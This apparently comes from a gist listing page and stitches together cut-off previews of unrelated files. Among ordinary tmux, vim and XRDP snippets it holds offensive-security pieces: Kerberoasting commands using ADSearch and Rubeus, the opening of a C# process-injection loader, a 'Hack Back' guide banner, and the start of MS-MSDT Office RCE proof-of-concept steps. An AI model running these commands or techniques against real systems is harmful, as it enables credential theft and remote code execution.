swtornio

# Red Team Checklist

## Kerberoasting

Find SPNS (can also be found from ADExplorer snapshot)
`C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(servicePrincipalName=*))" --attributes cn,servicePrincipalName,samAccountName`

Roast individually
`C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /user:sqlsvc /nowrap`

swtornio

#!/bin/sh
# This script based on linux-vm-tools for Ubuntu 22.02.
# Thanks to https://github.com/Hinara/linux-vm-tools/ to script

# This script is for Ubuntu 22.04 Jammy Jellyfish to download and install XRDP+XORGXRDP via
# source.
#
# Major thanks to: http://c-nergy.be/blog/?p=11336 for the tips.
#

swtornio

set -g history-limit 9999999
set -g mouse on
unbind -n MouseDrag1Pane
set-window-option -g mode-keys vi
set -g base-index 0                                     # Start window numbers at 0

# Log all panes by default to $HOME/tmux_logs
run-shell -b 'if [ ! -d "$HOME/tmux_logs" ];then mkdir $HOME/tmux_logs; fi'
# Prefix + c: Enable logging by default when a new window is created
bind c new-window\; pipe-pane -o 'bash -c "while IFS= read -r line; do echo \"\$(date +%%Y%%m%%dT%%H%%M%%SZ%%z): \$line\"; done" >>$HOME/tmux_logs/"'%Y-%m-%d-%H:%M:%S'-win#I-pane#P-#W-#S-tmux.log"'

swtornio

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;

namespace DinjectorWithQUserAPC
{


    public class Program

swtornio

syntax on
filetype indent on
set number
set shiftwidth=4
set expandtab
set nowrap

swtornio

#!/usr/bin/env python2

import SimpleHTTPServer
import SocketServer
import logging

PORT = 8000

class GetHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):

swtornio

Baracuda - http://www.barracudacentral.org/report/website-category/www.example.org

Bluecoat - https://sitereview.bluecoat.com/sitereview.jsp

Bright Cloud - https://www.brightcloud.com/tools/url-ip-lookup.php

CheckPoint- https://www.checkpoint.com/urlcat/

Cisco - Scansafe -  https://securityhub.cisco.com/web/submited_urls

swtornio

                _   _            _      ____             _    _ 
               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
               |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
                                                 
                                  A DIY Guide

swtornio

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

swtornio

#!/usr/bin/env python3


import argparse
import sys
import json

import logging